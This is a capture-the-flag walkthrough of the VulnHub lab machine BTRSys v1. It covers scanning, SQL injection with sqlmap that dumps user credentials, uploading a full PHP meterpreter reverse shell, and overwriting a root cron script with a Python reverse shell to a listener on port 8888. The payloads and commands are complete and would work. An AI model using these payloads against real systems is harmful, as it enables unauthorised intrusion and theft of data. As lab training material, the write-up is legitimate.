Hello guys. This is my first write up about vulnhub.com.

BTRSys: v1

First thing to do in pentest a machine in a network is discovery.
I used nmap to discover.

root@localhost:~# nmap 192.168.56.0/24

Starting Nmap 7.60 ( https://nmap.org ) at 2017-10-15 08:21 +07
Nmap scan report for 192.168.56.100
Host is up (0.000073s latency).
All 1000 scanned ports on 192.168.56.100 are filtered
MAC Address: 08:00:27:44:8C:88 (Oracle VirtualBox virtual NIC)

Nmap scan report for 192.168.56.101
Host is up (0.00027s latency).
Not shown: 997 closed ports
PORT   STATE SERVICE
21/tcp open  ftp
22/tcp open  ssh
80/tcp open  http
MAC Address: 08:00:27:30:55:83 (Oracle VirtualBox virtual NIC)

Nmap scan report for 192.168.56.1
Host is up (0.000010s latency).
Not shown: 999 closed ports
PORT    STATE SERVICE
902/tcp open  iss-realsecure

Nmap done: 256 IP addresses (3 hosts up) scanned in 113.21 seconds


Yes. The victim machine is 192.168.56.101. Next, go to check port 80.
Nothing, Just a page with blanks and wried characters.
If you notice you will see the file with extension php. Just REMEMBER !!!.

Time to recon, Bruteforcing Directory with extension is php

root@localhost:~# gobuster -w /usr/share/wordlists/dirb/big.txt -u http://192.168.56.101/ -s 200,204,403,301,302,307 -x php

Gobuster v1.2                OJ Reeves (@TheColonial)
=====================================================
[+] Mode         : dir
[+] Url/Domain   : http://192.168.56.101/
[+] Threads      : 10
[+] Wordlist     : /usr/share/wordlists/dirb/big.txt
[+] Status codes : 307,200,204,403,301,302
[+] Extensions   : .php
=====================================================
/.htpasswd (Status: 403)
/.htpasswd.php (Status: 403)
/.htaccess (Status: 403)
/.htaccess.php (Status: 403)
/assets (Status: 301)
/config.php (Status: 200)
/index.php (Status: 200)
/javascript (Status: 301)
/login.php (Status: 200)
/uploads (Status: 301)

Great !!! login.php let check it out. First F12 to view source code html you will see the javascript like below.
Remember /uploads directory.

<script type="text/javascript">
function control(){
	var user = document.getElementById("user").value;
    var pwd = document.getElementById("pwd").value;
	var str=user.substring(user.lastIndexOf("@")+1,user.length);
    if((pwd == "'")){
		alert("Hack Denemesi !!!");
    }
	else if (str!="btrisk.com"){
		alert("Yanlis Kullanici Bilgisi Denemektesiniz");
	}
	else{
      document.loginform.submit();
    }
}
</script>

it checks the pwd variable has "'" or not => I'm sure 100% a field containing a password is SQL Injection.

Lazy time starts. Sqlmap will help you check either it has sqlinjection or not.

root@localhost:~# sqlmap -u http://192.168.56.101/personel.php --data="kullanici_adi=ikaya%40btrisk.com&parola=asdasd" -p parola --dbs
        ___
       __H__
 ___ ___[.]_____ ___ ___  {1.1.10#stable}
|_ -| . [(]     | .'| . |
|___|_  ["]_|_|_|__,|  _|
      |_|V          |_|   http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting at 10:45:23

[10:45:23] [INFO] resuming back-end DBMS 'mysql'
[10:45:23] [INFO] testing connection to the target URL
[10:45:23] [INFO] heuristics detected web page charset 'ascii'
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: parola (POST)
    Type: UNION query
    Title: Generic UNION query (NULL) - 9 columns
    Payload: kullanici_adi=admin@btrisk.com&parola=123123' UNION ALL SELECT NULL,CONCAT(CONCAT('qbvbq','BaHSJEqetrTLOzfhQOikoEkmGilQclGIEPUyDDtn'),'qzxpq'),NULL,NULL,NULL,NULL,NULL,NULL,NULL-- EvoZ
---
[10:45:23] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu
web application technology: Apache 2.4.7, PHP 5.5.9
back-end DBMS: MySQL 5
[10:45:23] [INFO] fetching database names
available databases [4]:
[*] deneme
[*] information_schema
[*] mysql
[*] performance_schema

[10:45:23] [INFO] fetched data logged to text files under '/root/.sqlmap/output/192.168.56.101'

[*] shutting down at 10:45:23

Time to get contents of databases

root@localhost:# sqlmap -u http://192.168.56.101/personel.php --data="kullanici_adi=ikaya%40btrisk.com&parola=asdasd" -p parola -D deneme --dump
        ___
       __H__
 ___ ___[']_____ ___ ___  {1.1.10#stable}
|_ -| . [']     | .'| . |
|___|_  [']_|_|_|__,|  _|
      |_|V          |_|   http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting at 10:47:41

[10:47:41] [INFO] resuming back-end DBMS 'mysql'
[10:47:41] [INFO] testing connection to the target URL
[10:47:41] [INFO] heuristics detected web page charset 'ascii'
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: parola (POST)
    Type: UNION query
    Title: Generic UNION query (NULL) - 9 columns
    Payload: kullanici_adi=admin@btrisk.com&parola=123123' UNION ALL SELECT NULL,CONCAT(CONCAT('qbvbq','BaHSJEqetrTLOzfhQOikoEkmGilQclGIEPUyDDtn'),'qzxpq'),NULL,NULL,NULL,NULL,NULL,NULL,NULL-- EvoZ
---
[10:47:41] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu
web application technology: Apache 2.4.7, PHP 5.5.9
back-end DBMS: MySQL 5
[10:47:41] [INFO] fetching tables for database: 'deneme'
[10:47:41] [INFO] fetching columns for table 'user' in database 'deneme'
[10:47:41] [INFO] fetching entries for table 'user' in database 'deneme'
[10:47:41] [INFO] analyzing table dump for possible password hashes
Database: deneme
Table: user
[2 entries]
+----+-----------+---------+---------+-------------+-------------+-------------+--------------+------------------+
| ID | Parola    | BabaAdi | AnneAdi | Ad_Soyad    | AnneMeslegi | BabaMeslegi | KardesSayisi | Kullanici_Adi    |
+----+-----------+---------+---------+-------------+-------------+-------------+--------------+------------------+
| 1  | asd123*** | ahmet   | nazli   | ismail kaya | lokantaci   | muhasebe    | 5            | ikaya@btrisk.com |
| 2  | asd123*** | mahmut  | gulsah  | can demir   | tuhafiyeci  | memur       | 8            | cdmir@btrisk.com |
+----+-----------+---------+---------+-------------+-------------+-------------+--------------+------------------+

[10:47:41] [INFO] table 'deneme.`user`' dumped to CSV file '/root/.sqlmap/output/192.168.56.101/dump/deneme/user.csv'
[10:47:41] [INFO] fetched data logged to text files under '/root/.sqlmap/output/192.168.56.101'

[*] shutting down at 10:47:41

Login with username "ikaya@btrisk.com" and password "asd123***" you will see a form to upload file.
This is the easy way to get shell in servers.
First we need to create a php shell with msfvenom

root@localhost:~# msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.56.1 LPORT=9999 -f raw > k123.php
No platform was selected, choosing Msf::Module::Platform::PHP from the payload
No Arch selected, selecting Arch: php from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 1113 bytes

You need to remove a comment in the first of file k123.php.
Uploadddddddddddddddddddddddddddddddddddd!

POST /gonder.php HTTP/1.1
Host: 192.168.56.101
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:56.0) Gecko/20100101 Firefox/56.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Content-Type: multipart/form-data; boundary=---------------------------637110577130219008425077991
Content-Length: 1328
Referer: http://192.168.56.101/personel.php
Connection: close
Upgrade-Insecure-Requests: 1

-----------------------------637110577130219008425077991
Content-Disposition: form-data; name="dosya"; filename="rshell.php"
Content-Type: image/jpeg

<?php /**/ error_reporting(0); $ip = '192.168.56.1'; $port = 9999; if (($f = 'stream_socket_client') && is_callable($f)) { $s = $f("tcp://{$ip}:{$port}"); $s_type = 'stream'; } if (!$s && ($f = 'fsockopen') && is_callable($f)) { $s = $f($ip, $port); $s_type = 'stream'; } if (!$s && ($f = 'socket_create') && is_callable($f)) { $s = $f(AF_INET, SOCK_STREAM, SOL_TCP); $res = @socket_connect($s, $ip, $port); if (!$res) { die(); } $s_type = 'socket'; } if (!$s_type) { die('no socket funcs'); } if (!$s) { die('no socket'); } switch ($s_type) { case 'stream': $len = fread($s, 4); break; case 'socket': $len = socket_read($s, 4); break; } if (!$len) { die(); } $a = unpack("Nlen", $len); $len = $a['len']; $b = ''; while (strlen($b) < $len) { switch ($s_type) { case 'stream': $b .= fread($s, $len-strlen($b)); break; case 'socket': $b .= socket_read($s, $len-strlen($b)); break; } } $GLOBALS['msgsock'] = $s; $GLOBALS['msgsock_type'] = $s_type; if (extension_loaded('suhosin') && ini_get('suhosin.executor.disable_eval')) { $suhosin_bypass=create_function('', $b); $suhosin_bypass(); } else { eval($b); } die();
-----------------------------637110577130219008425077991--

HTTP/1.1 200 OK
Date: Sun, 15 Oct 2017 09:16:10 GMT
Server: Apache/2.4.7 (Ubuntu)
X-Powered-By: PHP/5.5.9-1ubuntu4.21
Content-Length: 26
Connection: close
Content-Type: text/html

Dosya yuklendi!

What the hell "Dosya yuklendi!"? Google Translate says "Dosya yuklendi!" is "File uploaded!".
OK upload success. But wait... what url to my file ?. Just Remember the server has a uploads directory so go to check now.
Yes it is there.

Turn on msfconsole and play with a server.

root@localhost:~# msfconsole
msf > use exploit/multi/handler
msf exploit(handler) > set payload php/meterpreter/reverse_tcp
msf exploit(handler) > set LHOST 192.168.56.1
msf exploit(handler) > set LPORT 9999
msf exploit(handler) > exploit
[*] Exploit running as background job 0.
[*] Started reverse TCP handler on 192.168.56.1:9999
meterpreter > sysinfo
Computer    : BTRsys1
OS          : Linux BTRsys1 3.13.0-32-generic #57-Ubuntu SMP Tue Jul 15 03:51:12 UTC 2014 i686
Meterpreter : php/linux
meterpreter > shell
Process 1881 created.
Channel 6 created.
python -c "import pty; pty.spawn('/bin/bash');"
www-data@BTRsys1:/var/www/html/uploads$

Check manual some files on server and I found nothings for me. Time to automate local enumeration.
Get https://raw.githubusercontent.com/Arr0way/linux-local-enumeration-script/master/linux-local-enum.sh and upload to victim server and run.

After run this file you will see:

/var/tmp/cleaner.py.swp
/var/www/html/uploads/linux-local-enum.sh
/var/log/cronlog
/lib/log/cleaner.py

let check permission of file /lib/log/cleaner.py

www-data@BTRsys1:/var/www/html/uploads$ ls -la /lib/log/cleaner.py
ls -la /lib/log/cleaner.py
-rwxrwxrwx 1 root root 96 Aug 13  2014 /lib/log/cleaner.py

Perfect !!! let open and modify it to get root shell.

#!/usr/bin/env python
import os
import sys
import socket,subprocess,os

s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect(("192.168.56.1",8888))
os.dup2(s.fileno(),0)
os.dup2(s.fileno(),1)
os.dup2(s.fileno(),2)
p=subprocess.call(["/bin/bash","-i"])
try:
	os.system('rm -r /tmp/* ')
except:
	sys.exit()

In another terminal you just run the command and wait for it.

oot@localhost:~/Downloads# nc -lvp 8888
listening on [any] 8888 ...
192.168.56.101: inverse host lookup failed: Unknown host
connect to [192.168.56.1] from (UNKNOWN) [192.168.56.101] 54204
bash: cannot set terminal process group (2253): Inappropriate ioctl for device
bash: no job control in this shell
root@BTRsys1:~# id
id
uid=0(root) gid=0(root) groups=0(root)

Done !!!.

Another way to solve:

After a few moment I realize password of user root is asd123***.

Thanks to @ismailonderkaya for BTRSys v1.